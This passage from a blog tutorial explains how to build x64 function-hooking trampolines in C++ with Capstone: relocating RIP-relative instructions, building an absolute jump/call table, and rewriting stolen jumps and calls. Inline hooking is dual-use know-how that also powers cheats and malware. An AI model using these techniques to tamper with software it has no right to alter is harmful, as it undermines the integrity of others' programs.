<span class="k">return</span> <span class="kt">uint32_t</span><span class="p">(</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">absTableMem</span> <span class="o">-</span> <span class="n">dstMemForTrampoline</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>If we only ever needed to hook “easy” functions (as defined earlier), we could skip down to the last step in our trampoline creation procedure now. There’s a lot more legroom required to support less-than-easy functions though.</p>
<h3 id="step-2-fixing-up-rip-relative-addressing">Step 2: Fixing up RIP-Relative Addressing</h3>
<p>One case where our naiive trampoline building function will fail is if any of the stolen instructions contain rip-relative addressing. In x64, there are a <em>lot</em> of instructions that do this, but the easiest example is a function that calls printf.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">PrintHaha</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Haha</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>On my machine, the generated assembly uses an lea instruction to load the string location before the call to printf. The assembly string generated by visual studio makes it look like the lea call is grabbing an absolute address, but the instruction bytes reveal that we’re actually computing the address of the “Haha\n” string by adding an offset to the current value of the instruction pointer.</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">PrintHaha:
00007FFCB54211E0 48 8D 0D F9 1F 00 00 lea rcx,[string "Haha\n" (07FFCB54231E0h)]
00007FFCB54211E7 E9 24 FE FF FF jmp printf (07FFCB5421010h) </code></pre></figure>
<p>If we steal the lea instruction verbatim, we’ll get garbage data when we executed the stolen instruction because our instruction pointer will be at a different address. In order to actually use instructions that have rip-relative addressing in our trampoline, we need to fix up the offsets they use to be relative to our trampoline memory.</p>
<p>The first step of this is to detect when an instruction contains a rip-relative operand. Capstone makes this easy.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">bool</span> <span class="nf">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86</span><span class="o">*</span> <span class="n">x86</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">inst</span><span class="p">.</span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">.</span><span class="n">op_count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86_op</span><span class="o">*</span> <span class="n">op</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">x86</span><span class="o">-></span><span class="n">operands</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
<span class="c1">//mem type is rip relative, like lea rcx,[rip+0xbeef]</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span><span class="o">-></span><span class="n">type</span> <span class="o">==</span> <span class="n">X86_OP_MEM</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//if we're relative to rip</span>
<span class="k">return</span> <span class="n">op</span><span class="o">-></span><span class="n">mem</span><span class="p">.</span><span class="n">base</span> <span class="o">==</span> <span class="n">X86_REG_RIP</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Relocating an instruction that’s been identified as having a rip-relative operand is a bit more of a bear. Remember how I mentioned that we’re going to put our trampoline in memory that’s within a 32 bit jump of our target function? That’s to try to avoid cases where the new offset we compute is too large to be stored in the existing instruction’s operand.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">template</span><span class="o"><</span><span class="k">class</span> <span class="nc">T</span><span class="p">></span>
<span class="n">T</span> <span class="nf">GetDisplacement</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">inst</span><span class="p">,</span> <span class="kt">uint8_t</span> <span class="n">offset</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">T</span> <span class="n">disp</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">T</span><span class="p">));</span>
<span class="k">return</span> <span class="n">disp</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//rewrite instruction bytes so that any RIP-relative displacement operands</span>
<span class="c1">//make sense with wherever we're relocating to</span>
<span class="kt">void</span> <span class="nf">RelocateInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">inst</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">dstLocation</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86</span><span class="o">*</span> <span class="n">x86</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">inst</span><span class="o">-></span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">);</span>
<span class="kt">uint8_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_offset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">displacement</span> <span class="o">=</span> <span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_offset</span><span class="p">];</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_size</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">case</span> <span class="mi">1</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int8_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">uint8_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">2</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int16_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">uint16_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">4</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int32_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">int32_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Shout out to the <a href="https://github.com/stevemk14ebr/PolyHook/blob/577637181705ac52d2ae05a6db57ea709759ae56/PolyHook/PolyHook.hpp#L878">polyhook source</a> that I stole this logic from.</p>
<p>Plugging these functions into the BuildTrampoline() logic requires adding a check and a function call to the for loop that processes our stolen instructions.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numInstructions</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="c1">//perform any fixup logic to the stolen instructions here</span>
<span class="k">if</span> <span class="p">(</span><span class="n">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">RelocateInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">);</span>
<span class="n">stolenByteMem</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Now we can hook our little printf function with wild abandon!</p>
<h3 id="step-3-building-the-absolute-instruction-table">Step 3: Building the Absolute Instruction Table</h3>
<p>Next we need to deal with any relative jump or call instructions in our stolen bytes. After all “jump 10 bytes from here” doesn’t mean very much when the instruction has been moved to a new “here.” I have no idea how to handle loop instructions, so the example code will only deal with jmp and call instructions.</p>
<p>Like with the rip-relative operands, the first thing we need to do is identify whether an instruction is one of the flavors of jmp or call that we care about. Identifying relative calls is pretty easy, because there aren’t that many varieties of call instructions, and all the relative versions have opcodes that start with 0xE8.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">bool</span> <span class="nf">IsRelativeCall</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">bool</span> <span class="n">isCall</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_CALL</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">startsWithE8</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xE8</span><span class="p">;</span>
<span class="k">return</span> <span class="n">isCall</span> <span class="o">&&</span> <span class="n">startsWithE8</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Identifying jmps is a little harder because there are lots of different types of jmp instructions. Since conditional jumps <em>only</em> come in relative versions, if an instruction’s id says it’s a conditional jump, we know it uses relative addressing. The unconditional “jmp” instruction <em>can</em> use relative addressing, but it can also do things like jump to an address in a register. Thankfully, the behaviour of a jmp is dictated by it’s opcode bytes. Relative jmps start with 0xEB and 0xE9.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">bool</span> <span class="nf">IsRelativeJump</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">bool</span> <span class="n">isAnyJumpInstruction</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_JAE</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_JS</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">isJmp</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_JMP</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">startsWithEBorE9</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xEB</span> <span class="o">||</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xE9</span><span class="p">;</span>
<span class="k">return</span> <span class="n">isJmp</span> <span class="o">?</span> <span class="n">startsWithEBorE9</span> <span class="o">:</span> <span class="n">isAnyJumpInstruction</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>We can use these two functions to quickly identify any stolen instructions that are going to require extra attention:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numInstructions</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_LOOP</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_LOOPNE</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//bail out on loop instructions, I don't have a good way of handling them </span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">RelocateInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">IsRelativeJump</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">IsRelativeCall</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">);</span>
<span class="n">stolenByteMem</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></figure>
<p>Next We need to figure out the address that the original instruction wanted to go to, and add an absolute jump (or call) to that address to our Absolute Instruction Table. The Capstone library handles calculating the target address of relative instructions for us automatically, which is handy.</p>
<p>Jumps are easier to handle than calls, so we’ll start there. We’ll reuse the WriteAbsoluteJump64 function from earlier in this post to make the code a bit more concise.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">uint32_t</span> <span class="nf">AddJmpToAbsTable</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">jmp</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">targetAddrStr</span> <span class="o">=</span> <span class="n">jmp</span><span class="p">.</span><span class="n">op_str</span><span class="p">;</span> <span class="c1">//where the instruction intended to go</span>
<span class="kt">uint64_t</span> <span class="n">targetAddr</span> <span class="o">=</span> <span class="n">_strtoui64</span><span class="p">(</span><span class="n">targetAddrStr</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">absTableMem</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">targetAddr</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">13</span><span class="p">;</span> <span class="c1">//size of mov/jmp instrs for absolute jump</span>
<span class="p">}</span></code></pre></figure>
<p>Note that this function doesn’t rewrite the existing jump instruction, it only adds an absolute version of it to the absolute instruction table (AIT). We’ll handle pointing the original jump to this AIT entry later in this post.</p>
<p>Dealing with calls is a bit different. If we just add an absolute call instruction to our AIT, when that call returns, we’ll wind up at the next jump in the table. That would be bad, so instead we also need to add a jump instruction after our absolute calls to redirect program flow to somewhere more helpful. In this case, we’ll jump to the middle of our trampoline, which is the jump back to the hooked function’s body.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">uint32_t</span> <span class="nf">AddCallToAbsTable</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">call</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">jumpBackToHookedFunc</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">targetAddrStr</span> <span class="o">=</span> <span class="n">call</span><span class="p">.</span><span class="n">op_str</span><span class="p">;</span> <span class="c1">//where the instruction intended to go</span>
<span class="kt">uint64_t</span> <span class="n">targetAddr</span> <span class="o">=</span> <span class="n">_strtoui64</span><span class="p">(</span><span class="n">targetAddrStr</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dstMem</span> <span class="o">=</span> <span class="n">absTableMem</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="n">callAsmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="c1">//movabs 64 bit value into r10</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xD2</span><span class="p">,</span> <span class="c1">//call r10</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">callAsmBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">targetAddr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dstMem</span><span class="p">,</span> <span class="o">&</span><span class="n">callAsmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">));</span>
<span class="n">dstMem</span> <span class="o">+=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">);</span>
<span class="c1">//after the call, we need to add a second 2 byte jump, which will jump back to the </span>
<span class="c1">//final jump of the stolen bytes</span>
<span class="kt">uint8_t</span> <span class="n">jmpBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="n">jumpBackToHookedFunc</span> <span class="o">-</span> <span class="p">(</span><span class="n">absTableMem</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">))</span> <span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dstMem</span><span class="p">,</span> <span class="n">jmpBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">)</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">);</span> <span class="c1">//15</span>
<span class="p">}</span></code></pre></figure>
<p>You’ve probably noticed that both of these functions return the number of bytes that they wrote to the AIT. This is so we can increment the absTableMem pointer in BuildTrampoline(). These calls should be added inside the IsRelativeJump()/IsRelativeCall() conditionals in the BuildTrampoline() function.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numInstructions</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_LOOP</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_LOOPNE</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//bail out on loop instructions, I don't have a good way of handling them </span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">RelocateInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">IsRelativeJump</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddJmpToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="c1">//rewrite inst here</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">IsRelativeCall</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddCallToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">,</span> <span class="n">jumpBackMem</span><span class="p">);</span>
<span class="c1">//rewrite inst here</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">);</span>
<span class="n">stolenByteMem</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></figure>
<h3 id="step-4-rewriting-jumpscalls-to-use-the-ait">Step 4: Rewriting Jumps/Calls to Use the AIT.</h3>
<p>Adding instructions to the Absolute Instruction Table is great and all, but in order for any of that work to matter, we also need to rewrite our stolen relative instructions to actually go to the AIT. Similar to the last step, this needs to be handled differently for jumps vs calls.</p>
<p>Calls are the easier of the two to rewrite, so we’ll start with them. Since all call instructions are unconditional, we can replace any relative calls with jumps to the appropriate address inside the AIT. We know that our trampoline won’t be larger than 255 bytes, so we can use a 2 byte jmp instruction for this. We don’t want to change the size of the call instruction we’re rewriting, so we’ll first replace all the bytes for that instruction with NOPs. That way, if we rewrite a 4 byte call with a 2 byte jmp, we haven’t added garbage instructions to the trampoline.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">RewriteCallInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">instr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">instrPtr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableEntry</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">distToJumpTable</span> <span class="o">=</span> <span class="n">absTableEntry</span> <span class="o">-</span> <span class="p">(</span><span class="n">instrPtr</span> <span class="o">+</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">);</span>
<span class="c1">//calls need to be rewritten as relative jumps to the abs table</span>
<span class="c1">//but we want to preserve the length of the instruction, so pad with NOPs</span>
<span class="kt">uint8_t</span> <span class="n">jmpBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="n">distToJumpTable</span> <span class="p">};</span>
<span class="n">memset</span><span class="p">(</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">,</span> <span class="n">jmpBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">));</span>
<span class="p">}</span></code></pre></figure>
<p>Jumps are more of a pain. There are a lot of different jump instructions that we might encounter, many of which are some flavor of a conditional jump. We can’t replace these instructions with a normal jmp because that could change the execution logic of our stolen bytes. Instead we need to rewrite the operands directly, so that these jumps will conditionally jump to the Absolute Instruction Table.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">RewriteJumpInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">instr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">instrPtr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableEntry</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">distToJumpTable</span> <span class="o">=</span> <span class="n">absTableEntry</span> <span class="o">-</span> <span class="p">(</span><span class="n">instrPtr</span> <span class="o">+</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">);</span>
<span class="c1">//jmp instructions can have a 1 or 2 byte opcode, and need a 1-4 byte operand</span>
<span class="c1">//rewrite the operand for the jump to go to the jump table</span>
<span class="kt">uint8_t</span> <span class="n">instrByteSize</span> <span class="o">=</span> <span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0x0F</span> <span class="o">?</span> <span class="mi">2</span> <span class="o">:</span> <span class="mi">1</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="n">operandSize</span> <span class="o">=</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span> <span class="o">-</span> <span class="n">instrByteSize</span><span class="p">;</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">operandSize</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">case</span> <span class="mi">1</span><span class="p">:</span> <span class="p">{</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">]</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="p">}</span><span class="k">break</span><span class="p">;</span>
